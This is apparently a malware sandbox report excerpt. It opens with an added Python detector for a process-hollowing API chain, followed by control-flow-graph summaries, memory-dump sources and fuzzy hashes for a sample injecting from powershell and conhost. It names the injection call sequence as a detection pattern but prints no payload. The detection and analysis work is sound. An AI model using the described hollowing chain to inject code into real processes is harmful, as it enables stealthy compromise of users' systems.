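The execution graph for this snapshot chains CreateProcessA, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread in one function family, with CreateFileA, CreateFileMappingW and MapViewOfFile alongside, which is the call pattern a detection engineer would hunt for in an API trace. The following is an added example, not part of the Joe Sandbox report or of the analysed sample: it runs an ordered-subsequence check for that chain over a per-process API trace. The whitespace-separated "pid seq api" trace format and all events in SAMPLE_TRACE are constructed for the example; the Win32 equivalents (CreateProcessW, WriteProcessMemory, SetThreadContext, ResumeThread) are added so the check generalizes beyond the exact names in this graph.

```python
"""Ordered API-chain check for process-hollowing style injection.

Added example, not from the Joe Sandbox report. The trace format
("pid seq api" per line) and the sample events are constructed.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Sequence


class ApiEvent(NamedTuple):
    pid: int   # process the call was observed in
    seq: int   # monotonically increasing call index within the trace
    api: str   # API name as logged


# Stages of the chain seen in the execution graph above, in the order they
# must occur. Each stage is satisfied by any API name in its set; the Win32
# wrappers are added as an assumption so renamed stubs do not evade the check.
HOLLOWING_STAGES: Sequence[frozenset] = (
    frozenset({"CreateProcessA", "CreateProcessW"}),
    frozenset({"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    frozenset({"NtWriteVirtualMemory", "WriteProcessMemory"}),
    frozenset({"NtSetContextThread", "SetThreadContext"}),
    frozenset({"NtResumeThread", "ResumeThread"}),
)


def parse_trace(text: str) -> List[ApiEvent]:
    """Parse 'pid seq api' lines; '#' comments and blank lines are skipped."""
    events: List[ApiEvent] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        pid, seq, api = line.split()
        events.append(ApiEvent(int(pid), int(seq), api))
    return events


def match_hollowing(events: Iterable[ApiEvent]) -> Dict[int, List[ApiEvent]]:
    """Return {pid: matched events} for every pid whose trace contains all
    stages in order. Greedy earliest-match is sufficient for subsequence
    existence, so a stage only counts after the previous one has matched:
    NtResumeThread before NtWriteVirtualMemory does not complete the chain."""
    by_pid: Dict[int, List[ApiEvent]] = defaultdict(list)
    for ev in events:
        by_pid[ev.pid].append(ev)

    hits: Dict[int, List[ApiEvent]] = {}
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e.seq)
        stage = 0
        matched: List[ApiEvent] = []
        for ev in evs:
            if stage < len(HOLLOWING_STAGES) and ev.api in HOLLOWING_STAGES[stage]:
                matched.append(ev)
                stage += 1
        if stage == len(HOLLOWING_STAGES):
            hits[pid] = matched
    return hits


def detect(trace_text: str) -> Dict[int, List[ApiEvent]]:
    """Parse a trace and return the hollowing hits per pid."""
    return match_hollowing(parse_trace(trace_text))


# Constructed trace (not taken from the report). pid 4012 performs the full
# chain after mapping a payload file; 7788 resumes the thread before writing
# to it (wrong order, no hit); 5120 is an ordinary launcher (no hit).
SAMPLE_TRACE = """\
# pid seq api
4012 1 K32GetModuleInformation
4012 2 CreateFileA
4012 3 CreateFileMappingW
4012 4 MapViewOfFile
4012 5 CreateProcessA
4012 6 NtUnmapViewOfSection
4012 7 NtWriteVirtualMemory
4012 8 NtWriteVirtualMemory
4012 9 NtSetContextThread
4012 10 NtResumeThread
7788 1 CreateProcessA
7788 2 NtUnmapViewOfSection
7788 3 NtResumeThread
7788 4 NtWriteVirtualMemory
7788 5 NtSetContextThread
5120 1 CreateProcessA
5120 2 NtResumeThread
"""

if __name__ == "__main__":
    for pid, chain in detect(SAMPLE_TRACE).items():
        steps = " -> ".join(f"{e.api}@{e.seq}" for e in chain)
        print(f"pid {pid}: hollowing chain matched: {steps}")
```

The stages deliberately omit the file-mapping calls (CreateFileA, CreateFileMappingW, MapViewOfFile): they are how this loader stages the payload, but the same chain can be fed from a buffer, so requiring them would make the check easy to evade.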

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph basic blocks (address range, API call if any → successor blocks)
                                                                                                    • 7ffd9bab04ed-7ffd9bab04f9 → 7ffd9bab04fb, 7ffd9bab0504
                                                                                                    • 7ffd9bab04fb-7ffd9bab0503 → 7ffd9bab0504
                                                                                                    • 7ffd9bab0504-7ffd9bab0578 → 7ffd9bab057a, 7ffd9bab0582
                                                                                                    • 7ffd9bab057a-7ffd9bab057f → 7ffd9bab0582
                                                                                                    • 7ffd9bab0582-7ffd9bab05c5 NtWriteVirtualMemory → 7ffd9bab05c7, 7ffd9bab05cd
                                                                                                    • 7ffd9bab05c7 → 7ffd9bab05cd
                                                                                                    • 7ffd9bab05cd-7ffd9bab0698 NtSetContextThread → 7ffd9bab069a, 7ffd9bab06a0
                                                                                                    • 7ffd9bab069a → 7ffd9bab06a0
                                                                                                    • 7ffd9bab06a0-7ffd9bab06c3
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextMemoryThreadVirtualWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 4272518735-0
                                                                                                    • Opcode ID: 5005c973fa87d2aa5bb3a9865e90252bd8b1db2bb85f59c3b273eeb8d43405c8
                                                                                                    • Instruction ID: a5897541c3c0ce82e7ad9a16c5265043e0974470570ce866dddd9b491a6a3309
                                                                                                    • Opcode Fuzzy Hash: 5005c973fa87d2aa5bb3a9865e90252bd8b1db2bb85f59c3b273eeb8d43405c8
                                                                                                    • Instruction Fuzzy Hash: BC71F63190DB8C8FDB69DF689845AE9BBF0EF56321F0442AFD049D7592CB74A805CB81

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph basic blocks (address range, API call if any → successor blocks)
                                                                                                    • 7ffd9baaf0e0-7ffd9bab0782 NtResumeThread → 7ffd9bab078a, 7ffd9bab0784
                                                                                                    • 7ffd9bab0784 → 7ffd9bab078a
                                                                                                    • 7ffd9bab078a-7ffd9bab07ad → 7ffd9bab07bb, 7ffd9bab07af
                                                                                                    • 7ffd9bab07af-7ffd9bab07b3 → 7ffd9bab07be, 7ffd9bab07b5
                                                                                                    • 7ffd9bab07b5-7ffd9bab07b8 → 7ffd9bab07bb
                                                                                                    • 7ffd9bab07bb-7ffd9bab07bd → 7ffd9bab07be
                                                                                                    • 7ffd9bab07be-7ffd9bab082a
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: b88166120057fab4d1b3ba44efe0261141f5ba230410f2a30d9d8ea473446d0e
                                                                                                    • Instruction ID: 97645d1e7dae0423daad4921e83b69377ca225055a2b5fd09ddc42dae521dd6a
                                                                                                    • Opcode Fuzzy Hash: b88166120057fab4d1b3ba44efe0261141f5ba230410f2a30d9d8ea473446d0e
                                                                                                    • Instruction Fuzzy Hash: 7E515C3190E7D84FE762CBA888656A9BFF0EF56710F0941FFC098C71A3CA646805CB91

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph basic blocks (address range, API call if any → successor blocks)
                                                                                                    • 7ffd9bab06c8-7ffd9bab06cb → 7ffd9bab06d6, 7ffd9bab06cd
                                                                                                    • 7ffd9bab06cd-7ffd9bab06d5 → 7ffd9bab06d6
                                                                                                    • 7ffd9bab06d6-7ffd9bab0782 NtResumeThread → 7ffd9bab078a, 7ffd9bab0784
                                                                                                    • 7ffd9bab0784 → 7ffd9bab078a
                                                                                                    • 7ffd9bab078a-7ffd9bab07ad → 7ffd9bab07bb, 7ffd9bab07af
                                                                                                    • 7ffd9bab07af-7ffd9bab07b3 → 7ffd9bab07be, 7ffd9bab07b5
                                                                                                    • 7ffd9bab07b5-7ffd9bab07b8 → 7ffd9bab07bb
                                                                                                    • 7ffd9bab07bb-7ffd9bab07bd → 7ffd9bab07be
                                                                                                    • 7ffd9bab07be-7ffd9bab082a
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 310769844fc1e3bb510c78c1b3f2ccaac12e36ce899e722acd4cf09e5c6a4bfb
                                                                                                    • Instruction ID: 8834f0bfc5e4b19c7e93ed07786d13cc741c3fc37aa3e4113a9b2ccbb3dce71d
                                                                                                    • Opcode Fuzzy Hash: 310769844fc1e3bb510c78c1b3f2ccaac12e36ce899e722acd4cf09e5c6a4bfb
                                                                                                    • Instruction Fuzzy Hash: 9041283190E7C84FDB66DB688C556A9BFF0EF57310F0901EBD098C71A3DAA45846CB92

                                                                                                    Control-flow Graph (interactive graph omitted; function blocks 7ffd9bab02ce-7ffd9bab03c3, calls NtUnmapViewOfSection)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SectionUnmapView
                                                                                                    • String ID:
                                                                                                    • API String ID: 498011366-0
                                                                                                    • Opcode ID: 9df4ea66f362c84e0b387fb74a27f4bf397b08dc06590d1b84a69ab2ab032c6d
                                                                                                    • Instruction ID: 973fea46533e4789d24be212185b16ebf8beb4ce81acce91118197083454af38
                                                                                                    • Opcode Fuzzy Hash: 9df4ea66f362c84e0b387fb74a27f4bf397b08dc06590d1b84a69ab2ab032c6d
                                                                                                    • Instruction Fuzzy Hash: EE41E63190E7888FDB56DB688C557E97FB0EF67320F08429BC048C71A7C665A445CB92
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1591575202-0
                                                                                                    • Opcode ID: 6405c46a7247431cf91dc6e5a9c1e097142454aecedf59c60f45ff47f29df31c
                                                                                                    • Instruction ID: 6f5aee3516f1291eff4f0098e4a24b413f137fb86a05ef412037a15bffa7a8ad
                                                                                                    • Opcode Fuzzy Hash: 6405c46a7247431cf91dc6e5a9c1e097142454aecedf59c60f45ff47f29df31c
                                                                                                    • Instruction Fuzzy Hash: 5B310831A0D64C8FDB58DF68C8557E9BBF0EB6A321F04416FD049C7162D674A846CB51

                                                                                                    Control-flow Graph (interactive graph omitted; function blocks starting at 7ffd9baac93f, calls CreateFileA and several internal subroutines)
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: xN_I
                                                                                                    • API String ID: 0-3353890570
                                                                                                    • Opcode ID: 5332f7d60dcedcaa1df6992e322444db134944592c1970d3bac03cc653020632
                                                                                                    • Instruction ID: ee8633f5133e64b80fb5bdb8e1eba404cee6dd7ec55ae339fae8860064788ac5
                                                                                                    • Opcode Fuzzy Hash: 5332f7d60dcedcaa1df6992e322444db134944592c1970d3bac03cc653020632
                                                                                                    • Instruction Fuzzy Hash: C8F14732A0DA4C4FE728DB5CAC552E87BD1FF94321F14027FE44DC71A3EA69A9428791

                                                                                                    Control-flow Graph (interactive graph omitted; function blocks 7ffd9bb718fc-7ffd9bb72a6a, no API calls resolved)
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2594050157.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9bb70000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ecbc74dc8b045b81a69c437d0306206d5e85252b77ba66ad56abe2cc5ab141ab
                                                                                                    • Instruction ID: 749bcbadfba32c322b318c64af4a5ee657fdeb9dcdc487e0be470ecc7f41be93
                                                                                                    • Opcode Fuzzy Hash: ecbc74dc8b045b81a69c437d0306206d5e85252b77ba66ad56abe2cc5ab141ab
                                                                                                    • Instruction Fuzzy Hash: 64D2753120DA488FDB69EB2CC4A4E6577E1EFA9304B15459DD04ECB2A6DE31EC46CB81

                                                                                                    Control-flow Graph (interactive graph omitted; function blocks 7ffd9baafeb1-7ffd9bab023d, calls CreateProcessA)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 37a8a6efb9f52cff1fb929b70c46addd41bdd3821ac78d01a4e8a63d454a38a1
                                                                                                    • Instruction ID: 64fa2661e132855ef5385276c5eae12110aad297bdd8cf392c91c8c10cbfd41c
                                                                                                    • Opcode Fuzzy Hash: 37a8a6efb9f52cff1fb929b70c46addd41bdd3821ac78d01a4e8a63d454a38a1
                                                                                                    • Instruction Fuzzy Hash: 6BC1B330A18A8D8FDB78DF28C8567E977D1FB58710F10422EE85EC7291DF74A5858B82

                                                                                                    Control-flow Graph (interactive graph omitted; function blocks 7ffd9baaf070-7ffd9bab023d, calls CreateProcessA)
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea7f2fcfb7273c445489babdc1b1899a7e4f578c1a56c2008d20b997b07b53b7
                                                                                                    • Instruction ID: 47560529c6dbe11afad3258d2b1da03baaf7b5745bafb11ffc265df465a77487
                                                                                                    • Opcode Fuzzy Hash: ea7f2fcfb7273c445489babdc1b1899a7e4f578c1a56c2008d20b997b07b53b7
                                                                                                    • Instruction Fuzzy Hash: 7DC1D430A18A4D8FDB78DF68C8567E977D1FB58710F10422EE85EC3291DF74A9858B82

                                                                                                    Control-flow Graph (interactive graph omitted; function blocks 7ffd9baaf080-7ffd9bab023d, calls CreateProcessA)
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 031c526a290e199991841d56e9987f7567436fd5d6c06b66462e136ac3f32132
                                                                                                    • Instruction ID: 3f6203cfdbee5eef6802870cdb7ea22e9ce53913eed894b78e3214b54d9f024b
                                                                                                    • Opcode Fuzzy Hash: 031c526a290e199991841d56e9987f7567436fd5d6c06b66462e136ac3f32132
                                                                                                    • Instruction Fuzzy Hash: 23B1C330A18A4D8FDB78DF28C8567E977D1FB58710F10422EE85EC3291DB74A9858B82

                                                                                                    Control-flow Graph (interactive graph omitted; function blocks 7ffd9baae54e-7ffd9baae765, calls CreateFileMappingW)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileMapping
                                                                                                    • String ID:
                                                                                                    • API String ID: 524692379-0
                                                                                                    • Opcode ID: 73fc1ebabf7d8031e6d46da7dd562d2badde65640031f97a7ee2afeaedac72de
                                                                                                    • Instruction ID: 3f00581da6813087d084877a503b95537ed613215d5eb7275fef6f91f5b3e30d
                                                                                                    • Opcode Fuzzy Hash: 73fc1ebabf7d8031e6d46da7dd562d2badde65640031f97a7ee2afeaedac72de
                                                                                                    • Instruction Fuzzy Hash: 23711530608B8D4FDB69DF28CC557E57BE1FF59310F14426EE84DC72A2CA74A8418B92

                                                                                                    Control-flow Graph (interactive graph omitted; function blocks 7ffd9baae2ec-7ffd9baae4ff, calls CreateFileA)
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 858fdbad393d3cfb3bdd7aae07d72ccd1a5f8b857828c4d81bf63be232a33bbb
                                                                                                    • Instruction ID: 44598ee97e56f14630ab075e570d8eec6eb67ded3768ae20d1f34cb4450a88ba
                                                                                                    • Opcode Fuzzy Hash: 858fdbad393d3cfb3bdd7aae07d72ccd1a5f8b857828c4d81bf63be232a33bbb
                                                                                                    • Instruction Fuzzy Hash: 3771F730A08B4D4FDB68EF68D8567E877E1FF59310F10426EE84DC7292CA75E9418B91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 625 7ffd9baae7b6-7ffd9baae7c3 626 7ffd9baae7c5-7ffd9baae7cd 625->626 627 7ffd9baae7ce-7ffd9baae7df 625->627 626->627 628 7ffd9baae7ea-7ffd9baae8a1 MapViewOfFile 627->628 629 7ffd9baae7e1-7ffd9baae7e9 627->629 633 7ffd9baae8a9-7ffd9baae8c6 628->633 634 7ffd9baae8a3 628->634 629->628 634->633
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileView
                                                                                                    • String ID:
                                                                                                    • API String ID: 3314676101-0
                                                                                                    • Opcode ID: 2d44d4f394c349b81c55665fdd8cd8f456f9244849f9dd63b7b40d9be5122a8c
                                                                                                    • Instruction ID: 873d3b7992a81da845a1b3b59deb7f81b3d129e967c58339c6aed7c972cf7837
                                                                                                    • Opcode Fuzzy Hash: 2d44d4f394c349b81c55665fdd8cd8f456f9244849f9dd63b7b40d9be5122a8c
                                                                                                    • Instruction Fuzzy Hash: 01412B3190CA889FDB1DDBA8D8156E97BF1FF56321F14026ED049D3192DB647412C791

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 635 7ffd9baae1e8-7ffd9baae1ef 636 7ffd9baae1fa-7ffd9baae2b0 K32GetModuleInformation 635->636 637 7ffd9baae1f1-7ffd9baae1f9 635->637 641 7ffd9baae2b8-7ffd9baae2e7 636->641 642 7ffd9baae2b2 636->642 637->636 642->641
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InformationModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 3425974696-0
                                                                                                    • Opcode ID: c38777687b9a1a412c626f10eb331269d67e976e08026b8cb694ed31892b49bd
                                                                                                    • Instruction ID: a6309eae124b2b29568889a82e765d98e525f9dedfb672897dc20ad746d7d1f3
                                                                                                    • Opcode Fuzzy Hash: c38777687b9a1a412c626f10eb331269d67e976e08026b8cb694ed31892b49bd
                                                                                                    • Instruction Fuzzy Hash: 75310631D0CA5C8FDB18DB9C984A6F9BBE1EF69321F04426FD049D3292DB756806C791

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 644 7ffd9baacbf0-7ffd9baae2b0 K32GetModuleInformation 650 7ffd9baae2b8-7ffd9baae2e7 644->650 651 7ffd9baae2b2 644->651 651->650
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2591755928.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9baa0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InformationModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 3425974696-0
                                                                                                    • Opcode ID: 727ec0f0e19b413a4e648ef91081b4d2f30b51444cf54563ae931e14d6d66dba
                                                                                                    • Instruction ID: 7edc50e246fd7e2d273a4a2e2fa6b022294b7ef64751adfd27429f0d801f607b
                                                                                                    • Opcode Fuzzy Hash: 727ec0f0e19b413a4e648ef91081b4d2f30b51444cf54563ae931e14d6d66dba
                                                                                                    • Instruction Fuzzy Hash: 6C31C731A0CA1C8FDB18DB9C98496F9BBE1EB59325F10423ED04DD3292DB75A8568781
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2605494338.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9bd20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f19c74062501cb5b362ec5d2a28abdc5306a58c9097e22e5dcbdd08bcf043b9c
                                                                                                    • Instruction ID: 4eae23aa56a6df2fdedf1a236c7a22e411f712f94d43976391727a87af4c66ee
                                                                                                    • Opcode Fuzzy Hash: f19c74062501cb5b362ec5d2a28abdc5306a58c9097e22e5dcbdd08bcf043b9c
                                                                                                    • Instruction Fuzzy Hash: FD31EA22B0DA5D0FEBBCDDAC64619F863D2DF99720B5511BBE51EC31D6DD18AD018380
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2594050157.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9bb70000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d969ca7188890bf7765ffc13f31795f7e4f9fe564676fea3096529d9da6a81d4
                                                                                                    • Instruction ID: 693d79d10a4ec4ce55ab59c3eb1bab65c59360a134ce6a16c90426f1b2c124de
                                                                                                    • Opcode Fuzzy Hash: d969ca7188890bf7765ffc13f31795f7e4f9fe564676fea3096529d9da6a81d4
                                                                                                    • Instruction Fuzzy Hash: EBE0D86370F9CD4FD7A4AAAC14681A877D0EF9A65531540FBE04DC71E3DD585C0D4300
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000028.00000002.2603418706.00007FFD9BCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_40_2_7ffd9bcc0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 209aacfdebc855e70cb34f166c4a8dc9bb4976d94ad3443e379dbffec0d97a6b
                                                                                                    • Instruction ID: daa1b3a18643ae265cbf3a850c79729eed0c8d3e759e028ecff811628de13432
                                                                                                    • Opcode Fuzzy Hash: 209aacfdebc855e70cb34f166c4a8dc9bb4976d94ad3443e379dbffec0d97a6b
                                                                                                    • Instruction Fuzzy Hash: 22D0A92274C80D8F8F48E90CEC92CF973D1E7A877071402ABE80AC3284CD22E88287C0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 1683269324-0
                                                                                                    • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                    • Instruction ID: 78e3d66f629b725962b868081889b28922997f6670c9d2125ea74b13ef9a4a59
                                                                                                    • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                    • Instruction Fuzzy Hash: B011A130ED4611C1FF27A720B4CAFD962B0BB4EF24F84C024A90A85194EF3DC8648B14

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 000001C08C1B1650: GetProcessHeap.KERNEL32 ref: 000001C08C1B165B
                                                                                                      • Part of subcall function 000001C08C1B1650: HeapAlloc.KERNEL32 ref: 000001C08C1B166A
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B16DA
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B1707
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B1721
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B1741
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B175C
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B177C
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B1797
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B17B7
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B17D2
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B17F2
                                                                                                    • Sleep.KERNEL32 ref: 000001C08C1B1C43
                                                                                                    • SleepEx.KERNELBASE ref: 000001C08C1B1C49
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B180D
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B182D
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B1848
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B1868
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B1883
                                                                                                      • Part of subcall function 000001C08C1B1650: RegOpenKeyExW.ADVAPI32 ref: 000001C08C1B18A3
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B18BE
                                                                                                      • Part of subcall function 000001C08C1B1650: RegCloseKey.ADVAPI32 ref: 000001C08C1B18C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
